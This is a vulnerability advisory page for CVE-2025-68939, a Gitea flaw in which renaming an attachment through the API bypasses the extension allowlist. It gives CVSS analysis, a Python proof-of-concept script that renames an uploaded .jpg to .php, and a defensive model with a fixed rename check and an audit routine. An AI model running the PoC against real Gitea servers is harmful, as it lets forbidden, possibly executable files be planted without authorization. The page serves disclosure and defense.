Security Vulnerability Report
CVE-2025-68939 CVSS 8.2 HIGH

Published: 2025-12-26 03:15:51
Last Modified: 2026-01-02 19:35:05

Description

Gitea before 1.23.0 allows attackers to add attachments with forbidden file extensions by editing an attachment name via an attachment API.

CVSS Details

CVSS Score (secondary source, the value shown in the page header)
8.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:L

NVD primary assessment (from the raw record at the end of this page)
5.3 MEDIUM
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

The two scorings disagree sharply. The 8.2 vector assumes a changed scope with high confidentiality and integrity impact (the attacker-controlled file ends up served or executed outside the attachment component); the NVD primary vector credits only a low integrity impact (a forbidden file name is stored, nothing more). Which one applies to a given deployment depends on whether anything downstream trusts the attachment's extension. The assigned weakness is CWE-424 (Improper Protection of Alternate Path), which matches the mechanism: the extension allowlist is enforced on the upload path but not on the rename path.

Configurations (Affected Products)

cpe:2.3:a:gitea:gitea:*:*:*:*:*:-:*:* - VULNERABLE
Gitea < 1.23.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# PoC for CVE-2025-68939 as published on this page: upload a file whose
# extension passes the allowlist, then rename it to a forbidden extension.
# The host, repository and credentials are placeholders to be filled in.
url = "http://target-gitea.com"
owner = "owner"
repo = "repo"
user = "user"
password = "password"  # the original used `pass`, which is a reserved word in Python

# Endpoint path exactly as given on this page. Gitea's documented attachment
# endpoints are scoped to an issue or a release, for example
# PATCH /api/v1/repos/{owner}/{repo}/issues/{index}/assets/{attachment_id}
# and PATCH /api/v1/repos/{owner}/{repo}/releases/{id}/assets/{attachment_id},
# so the path may need adjusting for the target.
upload_url = f"{url}/api/v1/repos/{owner}/{repo}/attachments"

# Step 1: upload a file whose extension (.jpg) is on the allowlist
files = {"file": ("test.jpg", b"fake image", "image/jpeg")}
response = requests.post(upload_url, files=files, auth=(user, password))
response.raise_for_status()
data = response.json()
# the original indexed [0]; accept either a list or a single attachment object
attachment_id = (data[0] if isinstance(data, list) else data)["id"]

# Step 2: rename the attachment to a forbidden extension; vulnerable versions
# update the name without re-running the allowlist check
rename_url = f"{url}/api/v1/repos/{owner}/{repo}/attachments/{attachment_id}"
rename = requests.patch(rename_url, json={"name": "test.php"}, auth=(user, password))
print(rename.status_code, rename.text)
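The mechanism behind the description, as an added example that is neither Gitea's code nor the PoC above: a simplified in-memory model of an attachment allowlist written in the format of Gitea's `[attachment] ALLOWED_TYPES` setting, with the upload-time check, a rename path that skips it (the pre-1.23.0 behaviour this page describes), a rename path that re-applies it, and an audit pass over stored names for instances that ran a vulnerable version. The magic-byte table, the sample attachments and the exact matching rule (an entry matches on the file extension or on the sniffed MIME pattern, whichever hits) are assumptions of the example, not a transcription of Gitea's implementation.

```python
import os
from dataclasses import dataclass

# Constructed allowlist in the format of Gitea's [attachment] ALLOWED_TYPES:
# extensions start with "." and MIME entries may use "type/*" or "*/*".
ALLOWED_TYPES = ".csv,.docx,.gif,.jpeg,.jpg,.log,.md,.pdf,.png,.txt,.zip"

# Minimal magic-byte table for content sniffing (constructed for the example).
_MAGIC = [
    (b"\x89PNG\r\n\x1a\n", "image/png"),
    (b"\xff\xd8\xff", "image/jpeg"),
    (b"GIF8", "image/gif"),
    (b"%PDF-", "application/pdf"),
    (b"PK\x03\x04", "application/zip"),
]


def sniff_mime(content: bytes) -> str:
    """Guess a MIME type from the first bytes of the content."""
    for magic, mime in _MAGIC:
        if content.startswith(magic):
            return mime
    head = content[:512]
    if all(b in b"\t\r\n" or 0x20 <= b < 0x7F for b in head):
        return "text/plain"
    return "application/octet-stream"


def verify(name: str, content: bytes, allowed: str = ALLOWED_TYPES) -> bool:
    """Allowlist check applied to a (name, content) pair. Assumption of this
    model: an entry matches if the name ends with an allowed extension, or if
    the sniffed MIME type matches an allowed MIME entry or "type/*" pattern."""
    mime = sniff_mime(content)
    lname = name.lower()
    for entry in (e.strip().lower() for e in allowed.split(",")):
        if not entry:
            continue
        if entry == "*/*":
            return True
        if entry.startswith("."):
            if lname.endswith(entry):
                return True
        elif entry.endswith("/*"):
            if mime.startswith(entry[:-1]):  # "image/*" -> "image/"
                return True
        elif entry == mime:
            return True
    return False


@dataclass
class Attachment:
    id: int
    name: str
    content: bytes


class AttachmentStore:
    """In-memory stand-in for the attachment table of a Gitea instance."""

    def __init__(self, allowed: str = ALLOWED_TYPES):
        self.allowed = allowed
        self._items: dict[int, Attachment] = {}
        self._next_id = 1

    def upload(self, name: str, content: bytes) -> Attachment:
        # Upload path: the allowlist is enforced here in all versions.
        if not verify(name, content, self.allowed):
            raise ValueError(f"upload rejected: {name!r} is not allowed")
        att = Attachment(self._next_id, name, content)
        self._items[att.id] = att
        self._next_id += 1
        return att

    def rename_vulnerable(self, att_id: int, new_name: str) -> Attachment:
        # Pre-1.23.0 behaviour as described on this page: the name is updated
        # on the alternate (rename) path without re-running the check.
        att = self._items[att_id]
        att.name = new_name
        return att

    def rename_fixed(self, att_id: int, new_name: str) -> Attachment:
        # Hardened rename: the new name must pass the same check as an upload
        # of the stored content under that name would.
        att = self._items[att_id]
        if not verify(new_name, att.content, self.allowed):
            raise ValueError(f"rename rejected: {new_name!r} is not allowed")
        att.name = new_name
        return att

    def audit(self) -> list[int]:
        """Post-hoc check for an instance that ran a vulnerable version:
        ids of attachments whose current name no longer passes the check."""
        return [a.id for a in self._items.values()
                if not verify(a.name, a.content, self.allowed)]


def demo() -> dict:
    """Replay the page's scenario against both rename paths."""
    store = AttachmentStore()
    att = store.upload("test.jpg", b"fake image")  # passes on extension
    store.rename_vulnerable(att.id, "test.php")     # slips through
    flagged = store.audit()                         # audit finds it afterwards
    fixed = AttachmentStore()
    att2 = fixed.upload("test.jpg", b"fake image")
    try:
        fixed.rename_fixed(att2.id, "test.php")
        blocked = False
    except ValueError:
        blocked = True
    return {"renamed_to": att.name, "flagged": flagged, "fixed_blocked": blocked}
```

One consequence of the extension-or-MIME rule in this model, worth checking against your own `ALLOWED_TYPES`: if the allowlist contains a pattern such as `image/*`, a rename to `.php` still passes `verify` whenever the stored bytes sniff as an image, so an extension-only allowlist is the stricter configuration for the rename path. The `audit` method is the check to run once on an instance upgraded from a version before 1.23.0, since the fix stops new renames but does not rewrite names stored earlier.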

References

https://blog.gitea.com/release-of-1.23.0/ (Release Notes)
https://github.com/go-gitea/gitea/pull/32151 (Issue Tracking, Patch)
https://github.com/go-gitea/gitea/releases/tag/v1.23.0 (Release Notes)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68939", "sourceIdentifier": "[email protected]", "published": "2025-12-26T03:15:50.653", "lastModified": "2026-01-02T19:35:04.913", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Gitea before 1.23.0 allows attackers to add attachments with forbidden file extensions by editing an attachment name via an attachment API."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:L", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.6, "impactScore": 6.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-424"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gitea:gitea:*:*:*:*:*:-:*:*", "versionEndExcluding": "1.23.0", "matchCriteriaId": "6477BDC2-3013-450E-8A00-4AC462B1A1BD"}]}]}], "references": [{"url": "https://blog.gitea.com/release-of-1.23.0/", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/go-gitea/gitea/pull/32151", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/go-gitea/gitea/releases/tag/v1.23.0", "source": "[email protected]", "tags": ["Release Notes"]}]}}